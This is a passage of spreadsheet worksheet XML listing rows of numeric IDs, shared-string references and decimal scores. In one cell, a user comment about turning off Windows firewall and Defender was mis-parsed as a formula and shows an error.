      <c r="B30563" s="2">
        <v>4.7702584E7</v>
      </c>
      <c r="C30563" s="2" t="s">
        <v>29386</v>
      </c>
      <c r="D30563" s="2">
        <v>1.0</v>
      </c>
      <c r="E30563" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30563" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="30564" ht="15.75" customHeight="1">
      <c r="A30564" s="1">
        <v>7558.0</v>
      </c>
      <c r="B30564" s="2">
        <v>5.1544232E7</v>
      </c>
      <c r="C30564" s="2" t="s">
        <v>29387</v>
      </c>
      <c r="D30564" s="2">
        <v>1.0</v>
      </c>
      <c r="E30564" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30564" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="30565" ht="15.75" customHeight="1">
      <c r="A30565" s="1">
        <v>10662.0</v>
      </c>
      <c r="B30565" s="2">
        <v>1.4241397E7</v>
      </c>
      <c r="C30565" s="2" t="s">
        <v>29388</v>
      </c>
      <c r="D30565" s="2">
        <v>1.0</v>
      </c>
      <c r="E30565" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30565" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="30566" ht="15.75" customHeight="1">
      <c r="A30566" s="1">
        <v>34240.0</v>
      </c>
      <c r="B30566" s="2">
        <v>4731066.0</v>
      </c>
      <c r="C30566" s="2" t="s">
        <v>29389</v>
      </c>
      <c r="D30566" s="2">
        <v>1.0</v>
      </c>
      <c r="E30566" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30566" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="30567" ht="15.75" customHeight="1">
      <c r="A30567" s="1">
        <v>3745.0</v>
      </c>
      <c r="B30567" s="2">
        <v>3.9689362E7</v>
      </c>
      <c r="C30567" s="2" t="s">
        <v>29390</v>
      </c>
      <c r="D30567" s="2">
        <v>1.0</v>
      </c>
      <c r="E30567" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30567" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="30568" ht="15.75" customHeight="1">
      <c r="A30568" s="1">
        <v>4285.0</v>
      </c>
      <c r="B30568" s="2">
        <v>4.1900191E7</v>
      </c>
      <c r="C30568" s="2" t="s">
        <v>29391</v>
      </c>
      <c r="D30568" s="2">
        <v>1.0</v>
      </c>
      <c r="E30568" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30568" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="30569" ht="15.75" customHeight="1">
      <c r="A30569" s="1">
        <v>5937.0</v>
      </c>
      <c r="B30569" s="2">
        <v>4.7267097E7</v>
      </c>
      <c r="C30569" s="2" t="s">
        <v>29392</v>
      </c>
      <c r="D30569" s="2">
        <v>1.0</v>
      </c>
      <c r="E30569" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30569" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="30570" ht="15.75" customHeight="1">
      <c r="A30570" s="1">
        <v>10337.0</v>
      </c>
      <c r="B30570" s="2">
        <v>5.7724148E7</v>
      </c>
      <c r="C30570" s="2" t="s">
        <v>29393</v>
      </c>
      <c r="D30570" s="2">
        <v>1.0</v>
      </c>
      <c r="E30570" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30570" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="30571" ht="15.75" customHeight="1">
      <c r="A30571" s="1">
        <v>12782.0</v>
      </c>
      <c r="B30571" s="2">
        <v>3.1356657E7</v>
      </c>
      <c r="C30571" s="2" t="s">
        <v>29394</v>
      </c>
      <c r="D30571" s="2">
        <v>1.0</v>
      </c>
      <c r="E30571" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30571" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="30572" ht="15.75" customHeight="1">
      <c r="A30572" s="1">
        <v>15615.0</v>
      </c>
      <c r="B30572" s="2">
        <v>4.3535361E7</v>
      </c>
      <c r="C30572" s="2" t="s">
        <v>29395</v>
      </c>
      <c r="D30572" s="2">
        <v>1.0</v>
      </c>
      <c r="E30572" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30572" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="30573" ht="15.75" customHeight="1">
      <c r="A30573" s="1">
        <v>15793.0</v>
      </c>
      <c r="B30573" s="2">
        <v>4.4209713E7</v>
      </c>
      <c r="C30573" s="2" t="s">
        <v>29396</v>
      </c>
      <c r="D30573" s="2">
        <v>1.0</v>
      </c>
      <c r="E30573" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30573" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="30574" ht="15.75" customHeight="1">
      <c r="A30574" s="1">
        <v>16142.0</v>
      </c>
      <c r="B30574" s="2">
        <v>4.5565907E7</v>
      </c>
      <c r="C30574" s="2" t="s">
        <v>29397</v>
      </c>
      <c r="D30574" s="2">
        <v>1.0</v>
      </c>
      <c r="E30574" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30574" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="30575" ht="15.75" customHeight="1">
      <c r="A30575" s="1">
        <v>16311.0</v>
      </c>
      <c r="B30575" s="2">
        <v>4.594405E7</v>
      </c>
      <c r="C30575" s="2" t="s">
        <v>29398</v>
      </c>
      <c r="D30575" s="2">
        <v>1.0</v>
      </c>
      <c r="E30575" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30575" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="30576" ht="15.75" customHeight="1">
      <c r="A30576" s="1">
        <v>17941.0</v>
      </c>
      <c r="B30576" s="2">
        <v>5.1249805E7</v>
      </c>
      <c r="C30576" s="2" t="s">
        <v>29399</v>
      </c>
      <c r="D30576" s="2">
        <v>1.0</v>
      </c>
      <c r="E30576" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30576" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="30577" ht="15.75" customHeight="1">
      <c r="A30577" s="1">
        <v>18107.0</v>
      </c>
      <c r="B30577" s="2">
        <v>5.1733482E7</v>
      </c>
      <c r="C30577" s="2" t="s">
        <v>29400</v>
      </c>
      <c r="D30577" s="2">
        <v>1.0</v>
      </c>
      <c r="E30577" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30577" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="30578" ht="15.75" customHeight="1">
      <c r="A30578" s="1">
        <v>23187.0</v>
      </c>
      <c r="B30578" s="2">
        <v>5.2331246E7</v>
      </c>
      <c r="C30578" s="2" t="s">
        <v>29401</v>
      </c>
      <c r="D30578" s="2">
        <v>1.0</v>
      </c>
      <c r="E30578" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30578" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="30579" ht="15.75" customHeight="1">
      <c r="A30579" s="1">
        <v>25141.0</v>
      </c>
      <c r="B30579" s="2">
        <v>1.3029614E7</v>
      </c>
      <c r="C30579" s="2" t="s">
        <v>29402</v>
      </c>
      <c r="D30579" s="2">
        <v>1.0</v>
      </c>
      <c r="E30579" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30579" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="30580" ht="15.75" customHeight="1">
      <c r="A30580" s="1">
        <v>25401.0</v>
      </c>
      <c r="B30580" s="2">
        <v>1.3758216E7</v>
      </c>
      <c r="C30580" s="2" t="s">
        <v>29403</v>
      </c>
      <c r="D30580" s="2">
        <v>1.0</v>
      </c>
      <c r="E30580" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30580" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="30581" ht="15.75" customHeight="1">
      <c r="A30581" s="1">
        <v>30444.0</v>
      </c>
      <c r="B30581" s="2">
        <v>3.9223644E7</v>
      </c>
      <c r="C30581" s="2" t="s">
        <v>29404</v>
      </c>
      <c r="D30581" s="2">
        <v>1.0</v>
      </c>
      <c r="E30581" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30581" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="30582" ht="15.75" customHeight="1">
      <c r="A30582" s="1">
        <v>30665.0</v>
      </c>
      <c r="B30582" s="2">
        <v>4.2153344E7</v>
      </c>
      <c r="C30582" s="2" t="s">
        <v>29405</v>
      </c>
      <c r="D30582" s="2">
        <v>1.0</v>
      </c>
      <c r="E30582" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30582" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="30583" ht="15.75" customHeight="1">
      <c r="A30583" s="1">
        <v>2141.0</v>
      </c>
      <c r="B30583" s="2">
        <v>3.1612223E7</v>
      </c>
      <c r="C30583" s="2" t="s">
        <v>29406</v>
      </c>
      <c r="D30583" s="2">
        <v>1.0</v>
      </c>
      <c r="E30583" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30583" s="2">
        <v>0.1173835125448029</v>
      </c>
    </row>
    <row r="30584" ht="15.75" customHeight="1">
      <c r="A30584" s="1">
        <v>8849.0</v>
      </c>
      <c r="B30584" s="2">
        <v>5.4723792E7</v>
      </c>
      <c r="C30584" s="2" t="s">
        <v>29407</v>
      </c>
      <c r="D30584" s="2">
        <v>1.0</v>
      </c>
      <c r="E30584" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30584" s="2">
        <v>0.1173835125448029</v>
      </c>
    </row>
    <row r="30585" ht="15.75" customHeight="1">
      <c r="A30585" s="1">
        <v>16233.0</v>
      </c>
      <c r="B30585" s="2">
        <v>4.574689E7</v>
      </c>
      <c r="C30585" s="2" t="s">
        <v>29408</v>
      </c>
      <c r="D30585" s="2">
        <v>1.0</v>
      </c>
      <c r="E30585" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30585" s="2">
        <v>0.1173835125448029</v>
      </c>
    </row>
    <row r="30586" ht="15.75" customHeight="1">
      <c r="A30586" s="1">
        <v>18204.0</v>
      </c>
      <c r="B30586" s="2">
        <v>5.2053865E7</v>
      </c>
      <c r="C30586" s="2" t="s">
        <v>29409</v>
      </c>
      <c r="D30586" s="2">
        <v>1.0</v>
      </c>
      <c r="E30586" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30586" s="2">
        <v>0.1173835125448029</v>
      </c>
    </row>
    <row r="30587" ht="15.75" customHeight="1">
      <c r="A30587" s="1">
        <v>3798.0</v>
      </c>
      <c r="B30587" s="2">
        <v>3.9978492E7</v>
      </c>
      <c r="C30587" s="2" t="s">
        <v>29410</v>
      </c>
      <c r="D30587" s="2">
        <v>1.0</v>
      </c>
      <c r="E30587" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30587" s="2">
        <v>0.117283950617284</v>
      </c>
    </row>
    <row r="30588" ht="15.75" customHeight="1">
      <c r="A30588" s="1">
        <v>14510.0</v>
      </c>
      <c r="B30588" s="2">
        <v>3.9711497E7</v>
      </c>
      <c r="C30588" s="2" t="s">
        <v>29411</v>
      </c>
      <c r="D30588" s="2">
        <v>1.0</v>
      </c>
      <c r="E30588" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30588" s="2">
        <v>0.117283950617284</v>
      </c>
    </row>
    <row r="30589" ht="15.75" customHeight="1">
      <c r="A30589" s="1">
        <v>24847.0</v>
      </c>
      <c r="B30589" s="2">
        <v>1.2190983E7</v>
      </c>
      <c r="C30589" s="2" t="s">
        <v>29412</v>
      </c>
      <c r="D30589" s="2">
        <v>1.0</v>
      </c>
      <c r="E30589" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30589" s="2">
        <v>0.117283950617284</v>
      </c>
    </row>
    <row r="30590" ht="15.75" customHeight="1">
      <c r="A30590" s="1">
        <v>16986.0</v>
      </c>
      <c r="B30590" s="2">
        <v>4.8333113E7</v>
      </c>
      <c r="C30590" s="2" t="s">
        <v>29413</v>
      </c>
      <c r="D30590" s="2">
        <v>1.0</v>
      </c>
      <c r="E30590" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30590" s="2">
        <v>0.117003367003367</v>
      </c>
    </row>
    <row r="30591" ht="15.75" customHeight="1">
      <c r="A30591" s="1">
        <v>10091.0</v>
      </c>
      <c r="B30591" s="2">
        <v>5.7179735E7</v>
      </c>
      <c r="C30591" s="2" t="s">
        <v>29414</v>
      </c>
      <c r="D30591" s="2">
        <v>1.0</v>
      </c>
      <c r="E30591" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30591" s="2">
        <v>0.1168300653594772</v>
      </c>
    </row>
    <row r="30592" ht="15.75" customHeight="1">
      <c r="A30592" s="1">
        <v>3560.0</v>
      </c>
      <c r="B30592" s="2">
        <v>3.8840972E7</v>
      </c>
      <c r="C30592" s="2" t="s">
        <v>29415</v>
      </c>
      <c r="D30592" s="2">
        <v>1.0</v>
      </c>
      <c r="E30592" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30592" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="30593" ht="15.75" customHeight="1">
      <c r="A30593" s="1">
        <v>3567.0</v>
      </c>
      <c r="B30593" s="2">
        <v>3.8939646E7</v>
      </c>
      <c r="C30593" s="2" t="s">
        <v>29416</v>
      </c>
      <c r="D30593" s="2">
        <v>1.0</v>
      </c>
      <c r="E30593" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30593" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="30594" ht="15.75" customHeight="1">
      <c r="A30594" s="1">
        <v>4253.0</v>
      </c>
      <c r="B30594" s="2">
        <v>4.181164E7</v>
      </c>
      <c r="C30594" s="2" t="s">
        <v>29417</v>
      </c>
      <c r="D30594" s="2">
        <v>1.0</v>
      </c>
      <c r="E30594" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30594" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="30595" ht="15.75" customHeight="1">
      <c r="A30595" s="1">
        <v>5401.0</v>
      </c>
      <c r="B30595" s="2">
        <v>4.549346E7</v>
      </c>
      <c r="C30595" s="2" t="s">
        <v>29418</v>
      </c>
      <c r="D30595" s="2">
        <v>1.0</v>
      </c>
      <c r="E30595" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30595" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="30596" ht="15.75" customHeight="1">
      <c r="A30596" s="1">
        <v>8321.0</v>
      </c>
      <c r="B30596" s="2">
        <v>5.3641868E7</v>
      </c>
      <c r="C30596" s="2" t="s">
        <v>29419</v>
      </c>
      <c r="D30596" s="2">
        <v>1.0</v>
      </c>
      <c r="E30596" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30596" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="30597" ht="15.75" customHeight="1">
      <c r="A30597" s="1">
        <v>12794.0</v>
      </c>
      <c r="B30597" s="2">
        <v>3.1391453E7</v>
      </c>
      <c r="C30597" s="2" t="s">
        <v>29420</v>
      </c>
      <c r="D30597" s="2">
        <v>1.0</v>
      </c>
      <c r="E30597" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30597" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="30598" ht="15.75" customHeight="1">
      <c r="A30598" s="1">
        <v>218.0</v>
      </c>
      <c r="B30598" s="2">
        <v>1.4593875E7</v>
      </c>
      <c r="C30598" s="2" t="s">
        <v>29421</v>
      </c>
      <c r="D30598" s="2">
        <v>1.0</v>
      </c>
      <c r="E30598" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30598" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30599" ht="15.75" customHeight="1">
      <c r="A30599" s="1">
        <v>522.0</v>
      </c>
      <c r="B30599" s="2">
        <v>1.8288399E7</v>
      </c>
      <c r="C30599" s="2" t="s">
        <v>29422</v>
      </c>
      <c r="D30599" s="2">
        <v>1.0</v>
      </c>
      <c r="E30599" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30599" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30600" ht="15.75" customHeight="1">
      <c r="A30600" s="1">
        <v>738.0</v>
      </c>
      <c r="B30600" s="2">
        <v>2.083519E7</v>
      </c>
      <c r="C30600" s="2" t="s">
        <v>29423</v>
      </c>
      <c r="D30600" s="2">
        <v>1.0</v>
      </c>
      <c r="E30600" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30600" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30601" ht="15.75" customHeight="1">
      <c r="A30601" s="1">
        <v>1496.0</v>
      </c>
      <c r="B30601" s="2">
        <v>2.722728E7</v>
      </c>
      <c r="C30601" s="2" t="s">
        <v>29424</v>
      </c>
      <c r="D30601" s="2">
        <v>1.0</v>
      </c>
      <c r="E30601" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30601" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30602" ht="15.75" customHeight="1">
      <c r="A30602" s="1">
        <v>1829.0</v>
      </c>
      <c r="B30602" s="2">
        <v>2.9328388E7</v>
      </c>
      <c r="C30602" s="2" t="s">
        <v>29425</v>
      </c>
      <c r="D30602" s="2">
        <v>1.0</v>
      </c>
      <c r="E30602" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30602" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30603" ht="15.75" customHeight="1">
      <c r="A30603" s="1">
        <v>1920.0</v>
      </c>
      <c r="B30603" s="2">
        <v>3.005593E7</v>
      </c>
      <c r="C30603" s="2" t="s">
        <v>29426</v>
      </c>
      <c r="D30603" s="2">
        <v>1.0</v>
      </c>
      <c r="E30603" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30603" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30604" ht="15.75" customHeight="1">
      <c r="A30604" s="1">
        <v>1995.0</v>
      </c>
      <c r="B30604" s="2">
        <v>3.0546053E7</v>
      </c>
      <c r="C30604" s="2" t="s">
        <v>29427</v>
      </c>
      <c r="D30604" s="2">
        <v>1.0</v>
      </c>
      <c r="E30604" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30604" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30605" ht="15.75" customHeight="1">
      <c r="A30605" s="1">
        <v>2165.0</v>
      </c>
      <c r="B30605" s="2">
        <v>3.176271E7</v>
      </c>
      <c r="C30605" s="2" t="s">
        <v>29428</v>
      </c>
      <c r="D30605" s="2">
        <v>1.0</v>
      </c>
      <c r="E30605" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30605" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30606" ht="15.75" customHeight="1">
      <c r="A30606" s="1">
        <v>2183.0</v>
      </c>
      <c r="B30606" s="2">
        <v>3.1848833E7</v>
      </c>
      <c r="C30606" s="2" t="s">
        <v>29429</v>
      </c>
      <c r="D30606" s="2">
        <v>1.0</v>
      </c>
      <c r="E30606" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30606" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30607" ht="15.75" customHeight="1">
      <c r="A30607" s="1">
        <v>2386.0</v>
      </c>
      <c r="B30607" s="2">
        <v>3.3333094E7</v>
      </c>
      <c r="C30607" s="2" t="s">
        <v>29430</v>
      </c>
      <c r="D30607" s="2">
        <v>1.0</v>
      </c>
      <c r="E30607" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30607" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30608" ht="15.75" customHeight="1">
      <c r="A30608" s="1">
        <v>2931.0</v>
      </c>
      <c r="B30608" s="2">
        <v>3.5913463E7</v>
      </c>
      <c r="C30608" s="2" t="s">
        <v>29431</v>
      </c>
      <c r="D30608" s="2">
        <v>1.0</v>
      </c>
      <c r="E30608" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30608" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30609" ht="15.75" customHeight="1">
      <c r="A30609" s="1">
        <v>2989.0</v>
      </c>
      <c r="B30609" s="2">
        <v>3.6229535E7</v>
      </c>
      <c r="C30609" s="2" t="s">
        <v>29432</v>
      </c>
      <c r="D30609" s="2">
        <v>1.0</v>
      </c>
      <c r="E30609" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30609" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30610" ht="15.75" customHeight="1">
      <c r="A30610" s="1">
        <v>3030.0</v>
      </c>
      <c r="B30610" s="2">
        <v>3.645209E7</v>
      </c>
      <c r="C30610" s="2" t="s">
        <v>29433</v>
      </c>
      <c r="D30610" s="2">
        <v>1.0</v>
      </c>
      <c r="E30610" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30610" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30611" ht="15.75" customHeight="1">
      <c r="A30611" s="1">
        <v>3171.0</v>
      </c>
      <c r="B30611" s="2">
        <v>3.7053271E7</v>
      </c>
      <c r="C30611" s="2" t="s">
        <v>29434</v>
      </c>
      <c r="D30611" s="2">
        <v>1.0</v>
      </c>
      <c r="E30611" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30611" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30612" ht="15.75" customHeight="1">
      <c r="A30612" s="1">
        <v>3229.0</v>
      </c>
      <c r="B30612" s="2">
        <v>3.734621E7</v>
      </c>
      <c r="C30612" s="2" t="s">
        <v>29435</v>
      </c>
      <c r="D30612" s="2">
        <v>1.0</v>
      </c>
      <c r="E30612" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30612" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30613" ht="15.75" customHeight="1">
      <c r="A30613" s="1">
        <v>4046.0</v>
      </c>
      <c r="B30613" s="2">
        <v>4.1067489E7</v>
      </c>
      <c r="C30613" s="2" t="s">
        <v>29436</v>
      </c>
      <c r="D30613" s="2">
        <v>1.0</v>
      </c>
      <c r="E30613" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30613" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30614" ht="15.75" customHeight="1">
      <c r="A30614" s="1">
        <v>4143.0</v>
      </c>
      <c r="B30614" s="2">
        <v>4.1412855E7</v>
      </c>
      <c r="C30614" s="2" t="s">
        <v>29437</v>
      </c>
      <c r="D30614" s="2">
        <v>1.0</v>
      </c>
      <c r="E30614" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30614" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30615" ht="15.75" customHeight="1">
      <c r="A30615" s="1">
        <v>4369.0</v>
      </c>
      <c r="B30615" s="2">
        <v>4.2122553E7</v>
      </c>
      <c r="C30615" s="2" t="s">
        <v>29438</v>
      </c>
      <c r="D30615" s="2">
        <v>1.0</v>
      </c>
      <c r="E30615" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30615" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30616" ht="15.75" customHeight="1">
      <c r="A30616" s="1">
        <v>4442.0</v>
      </c>
      <c r="B30616" s="2">
        <v>4.2384906E7</v>
      </c>
      <c r="C30616" s="2" t="s">
        <v>29439</v>
      </c>
      <c r="D30616" s="2">
        <v>1.0</v>
      </c>
      <c r="E30616" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30616" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30617" ht="15.75" customHeight="1">
      <c r="A30617" s="1">
        <v>5575.0</v>
      </c>
      <c r="B30617" s="2">
        <v>4.6043094E7</v>
      </c>
      <c r="C30617" s="2" t="s">
        <v>29440</v>
      </c>
      <c r="D30617" s="2">
        <v>1.0</v>
      </c>
      <c r="E30617" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30617" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30618" ht="15.75" customHeight="1">
      <c r="A30618" s="1">
        <v>5847.0</v>
      </c>
      <c r="B30618" s="2">
        <v>4.6929937E7</v>
      </c>
      <c r="C30618" s="2" t="s">
        <v>29441</v>
      </c>
      <c r="D30618" s="2">
        <v>1.0</v>
      </c>
      <c r="E30618" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30618" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30619" ht="15.75" customHeight="1">
      <c r="A30619" s="1">
        <v>5979.0</v>
      </c>
      <c r="B30619" s="2">
        <v>4.7376575E7</v>
      </c>
      <c r="C30619" s="2" t="s">
        <v>29442</v>
      </c>
      <c r="D30619" s="2">
        <v>1.0</v>
      </c>
      <c r="E30619" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30619" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30620" ht="15.75" customHeight="1">
      <c r="A30620" s="1">
        <v>6124.0</v>
      </c>
      <c r="B30620" s="2">
        <v>4.7783708E7</v>
      </c>
      <c r="C30620" s="2" t="s">
        <v>29443</v>
      </c>
      <c r="D30620" s="2">
        <v>1.0</v>
      </c>
      <c r="E30620" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30620" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30621" ht="15.75" customHeight="1">
      <c r="A30621" s="1">
        <v>6213.0</v>
      </c>
      <c r="B30621" s="2">
        <v>4.8009105E7</v>
      </c>
      <c r="C30621" s="2" t="s">
        <v>29444</v>
      </c>
      <c r="D30621" s="2">
        <v>1.0</v>
      </c>
      <c r="E30621" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30621" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30622" ht="15.75" customHeight="1">
      <c r="A30622" s="1">
        <v>6296.0</v>
      </c>
      <c r="B30622" s="2">
        <v>4.8212085E7</v>
      </c>
      <c r="C30622" s="2" t="s">
        <v>29445</v>
      </c>
      <c r="D30622" s="2">
        <v>1.0</v>
      </c>
      <c r="E30622" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30622" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30623" ht="15.75" customHeight="1">
      <c r="A30623" s="1">
        <v>6335.0</v>
      </c>
      <c r="B30623" s="2">
        <v>4.829637E7</v>
      </c>
      <c r="C30623" s="2" t="s">
        <v>29446</v>
      </c>
      <c r="D30623" s="2">
        <v>1.0</v>
      </c>
      <c r="E30623" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30623" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30624" ht="15.75" customHeight="1">
      <c r="A30624" s="1">
        <v>6564.0</v>
      </c>
      <c r="B30624" s="2">
        <v>4.8896858E7</v>
      </c>
      <c r="C30624" s="2" t="s">
        <v>29447</v>
      </c>
      <c r="D30624" s="2">
        <v>1.0</v>
      </c>
      <c r="E30624" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30624" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30625" ht="15.75" customHeight="1">
      <c r="A30625" s="1">
        <v>6872.0</v>
      </c>
      <c r="B30625" s="2">
        <v>4.9694538E7</v>
      </c>
      <c r="C30625" s="2" t="str">
        <f> I tried turn of Windows firewall and Windows Defender.</f>
        <v>#ERROR!</v>
      </c>
      <c r="D30625" s="2">
        <v>1.0</v>
      </c>
      <c r="E30625" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30625" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30626" ht="15.75" customHeight="1">
      <c r="A30626" s="1">
        <v>7690.0</v>
      </c>
      <c r="B30626" s="2">
        <v>5.1952393E7</v>
      </c>
      <c r="C30626" s="2" t="s">
        <v>29448</v>
      </c>
      <c r="D30626" s="2">
        <v>1.0</v>
      </c>
      <c r="E30626" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30626" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30627" ht="15.75" customHeight="1">
      <c r="A30627" s="1">
        <v>7781.0</v>
      </c>
      <c r="B30627" s="2">
        <v>5.2181585E7</v>
      </c>
      <c r="C30627" s="2" t="s">
        <v>29449</v>
      </c>
      <c r="D30627" s="2">
        <v>1.0</v>
      </c>
      <c r="E30627" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30627" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30628" ht="15.75" customHeight="1">
      <c r="A30628" s="1">
        <v>7887.0</v>
      </c>
      <c r="B30628" s="2">
        <v>5.2440959E7</v>
      </c>
      <c r="C30628" s="2" t="s">
        <v>29450</v>
      </c>
      <c r="D30628" s="2">
        <v>1.0</v>
      </c>
      <c r="E30628" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30628" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30629" ht="15.75" customHeight="1">
      <c r="A30629" s="1">
        <v>8300.0</v>
      </c>
      <c r="B30629" s="2">
        <v>5.3561366E7</v>
      </c>
      <c r="C30629" s="2" t="s">
        <v>29451</v>
      </c>
      <c r="D30629" s="2">
        <v>1.0</v>
      </c>
      <c r="E30629" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30629" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30630" ht="15.75" customHeight="1">
